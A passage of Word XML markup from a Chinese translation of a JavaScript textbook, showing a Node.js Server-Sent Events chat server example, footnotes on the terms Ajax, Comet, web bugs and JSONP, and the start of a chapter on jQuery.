      </w:r>
      <w:r>
        <w:t>架构的探讨。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-17</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个用服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>编写的定制</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器。当一个客户端请求根</w:t>
      </w:r>
      <w:r>
        <w:t>URL“/”</w:t>
      </w:r>
      <w:r>
        <w:t>时，它会把例</w:t>
      </w:r>
      <w:r>
        <w:t>18-15</w:t>
      </w:r>
      <w:r>
        <w:t>里展示的聊天客户</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>端代码和例</w:t>
      </w:r>
      <w:r>
        <w:t>18-16</w:t>
      </w:r>
      <w:r>
        <w:t>中的模拟代码发送到客户端。当客户端创建了一个指向</w:t>
      </w:r>
      <w:r>
        <w:t>URL"/chat"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求时，它会用一个数组来保存响应数据流并保持连接处于打开状态。当客户端发起针对</w:t>
      </w:r>
      <w:r>
        <w:t>"chat"POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求时，它会将响应的主体部分作为一条聊天消息使用并写入数据，以</w:t>
      </w:r>
      <w:r>
        <w:t>"data:"</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>Server-Sent Even</w:t>
      </w:r>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:r>
        <w:t>的前缀，添加到每个已打开的响应数据流上。如果安装了</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>，那就可以在本地运行这个服务器例子。它监听</w:t>
      </w:r>
      <w:r>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:t>端口，因此在启动服务器之后，就可以用浏览器访问</w:t>
      </w:r>
      <w:r>
        <w:t>http://localhost:8000</w:t>
      </w:r>
      <w:r>
        <w:t>来进行聊天。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-17</w:t>
      </w:r>
      <w:r>
        <w:t>：定制的</w:t>
      </w:r>
      <w:r>
        <w:t>Server-Sent Events</w:t>
      </w:r>
      <w:r>
        <w:t>聊天服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个例子用的是服务器的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>，运行在</w:t>
      </w:r>
      <w:r>
        <w:t>NodeJS</w:t>
      </w:r>
      <w:r>
        <w:t>平台上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该聊天室的实现比较简单，而且是完全匿名的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将新的消息以</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>发送到</w:t>
      </w:r>
      <w:r>
        <w:t>/chat</w:t>
      </w:r>
      <w:r>
        <w:t>地址，或者以</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>形式从同一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>获取消息的文本</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>事件流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求到</w:t>
      </w:r>
      <w:r>
        <w:t>"/"</w:t>
      </w:r>
      <w:r>
        <w:t>来返回一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个文件包括客户端聊天</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var http=require('http');//NodeJS HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>聊天客户端使用的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，在下面会用到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var clientui=require('fs').readFileSync("chatclient.html");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var emulation=require('fs').readFileSync("EventSourceEmulation.js");//ServerResponse</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>象数组，用于接收发送的事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var clients=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>秒发送一条注释到客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这样它们就不会关闭连接再重连</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setInterval(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clients.forEach(function(client){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>client.write(":ping?n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},20000);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var server=new http.Server();//</w:t>
      </w:r>
      <w:r>
        <w:t>当服务器获取到一个新的请求，运行回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>server.on("request",function(reque</w:t>
      </w:r>
      <w:r>
        <w:t>st,response){//</w:t>
      </w:r>
      <w:r>
        <w:t>解析请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=require('url').parse(request.url);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求是发送到</w:t>
      </w:r>
      <w:r>
        <w:t>"/"</w:t>
      </w:r>
      <w:r>
        <w:t>，服务器就发送客户端聊天室</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(url.pathname==="/"){//</w:t>
      </w:r>
      <w:r>
        <w:t>聊天客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(200,{"Content-Type":"text/html"});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+emulation+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write(clientui);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求是发送到</w:t>
      </w:r>
      <w:r>
        <w:t>"/chat"</w:t>
      </w:r>
      <w:r>
        <w:t>之外的地址，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(url.pathname!=="/chat"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(404);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求类型是</w:t>
      </w:r>
      <w:r>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:t>，那么就有一个客户端发送了一条新的消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.method==="POST"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.setEncoding("utf8");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var body="";//</w:t>
      </w:r>
      <w:r>
        <w:t>在获取到数据之后，将其添加到请求主体中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.on("data",function(chunk){body+=chunk;});//</w:t>
      </w:r>
      <w:r>
        <w:t>当请求完成时，发送一个空响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并将消息传播到所有处于监听状态的客户端中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.on("end",function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(200);//</w:t>
      </w:r>
      <w:r>
        <w:t>响应该请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();//</w:t>
      </w:r>
      <w:r>
        <w:t>将消息转换成文本</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>事件流格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>确保每一行的前缀都是</w:t>
      </w:r>
      <w:r>
        <w:t>"data:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并以两个换行符结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>='data:'+body.replace('\n','\ndata:')+"\r\n\r\n";//</w:t>
      </w:r>
      <w:r>
        <w:t>发送消息给所有监听的客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clients.forEach(function(client){client.write(message);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Otherwise,a client is requesting a stream of messages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不是</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>类型的请求，则客户端正在请求一组消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(200,{'Content-Typ</w:t>
      </w:r>
      <w:r>
        <w:t>e':"text/event-stream"});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write("data:Connected\n\n");//</w:t>
      </w:r>
      <w:r>
        <w:t>如果客户端关闭了连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从活动客户端数组中删除对应的响应对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.connection.on("end",function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clients.splice(clients.indexOf(response),1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>记下响应对象，这样就可以向它发送未来的消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clients.push(response);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>启动服务器，监听</w:t>
      </w:r>
      <w:r>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:t>端口，访问</w:t>
      </w:r>
      <w:r>
        <w:t>http://localhost:8000/</w:t>
      </w:r>
      <w:r>
        <w:t>来进行使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>server.listen(8000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Asynchronous JavaScript and XML</w:t>
      </w:r>
      <w:r>
        <w:t>的缩写（未全部大写）。这个术语由</w:t>
      </w:r>
      <w:r>
        <w:t>Jesse James Carrett</w:t>
      </w:r>
      <w:r>
        <w:t>创造，最早出现在他于</w:t>
      </w:r>
      <w:r>
        <w:t>2005</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>月发表的文章</w:t>
      </w:r>
      <w:r>
        <w:t>"Ajax:A New Approach to Web Applications"</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http:www.adaptivepath.com/publications/essays</w:t>
      </w:r>
      <w:r>
        <w:t>/archives/000385.php</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>"Ajax"</w:t>
      </w:r>
      <w:r>
        <w:t>曾经是一个流行多年的术语，现在它只不过是一个有用的术语，来描述基于用脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用架构。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>这个名字是由</w:t>
      </w:r>
      <w:r>
        <w:t>Alex Russell</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>"Comet:Low Latency Data for the Browser"</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://infrequently.org/2006/03/comet-low-latency-data-for-the-browser/</w:t>
      </w:r>
      <w:r>
        <w:t>）中创造。这个名字可能是对</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>开了个玩笑，</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>都</w:t>
      </w:r>
      <w:r>
        <w:t>是美国的洗涤日用品牌。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>这种类型的图片也称为网页信标（</w:t>
      </w:r>
      <w:r>
        <w:t>web bug</w:t>
      </w:r>
      <w:r>
        <w:t>）。当网页信标不是与当前网页服务器而是其他服务器交流信息时，会担心隐私内容。这种第三方网页信标的方式常用于统计点击次数和网站流量分析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>Bob Ippolito</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>2005</w:t>
      </w:r>
      <w:r>
        <w:t>年提出了</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://bob.pythonmac.org/archives/2005/12/05/remote-json-jsonp/</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="Di_19Zhang__jQueryLei_Ku_____JavaScriptD"/>
      <w:bookmarkStart w:id="461" w:name="Di_19Zhang__jQueryLei_Ku_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的核心</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>设计得很简单，但由于浏览器之间的严重不兼容性</w:t>
      </w:r>
      <w:r>
        <w:t>，导致客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>过于复杂。</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>的到来，缓解了这种不兼容性导致的糟糕境况，然而使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>框架或工具类库，能简化通用操作，能隐藏浏览器之间的差异，这让很多程序员在开发</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用时变得更简单。撰写本书时，最流行和广泛采用的类库之一就是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库如此广泛地使用，作为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者，我们必须熟悉它：即便没有在自己的代码中使用它，也很有可能在他人写的代码中遇见。幸运的是，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>足够小巧和稳定，本书就可以把它讲述清楚。本章将全面介绍</w:t>
      </w:r>
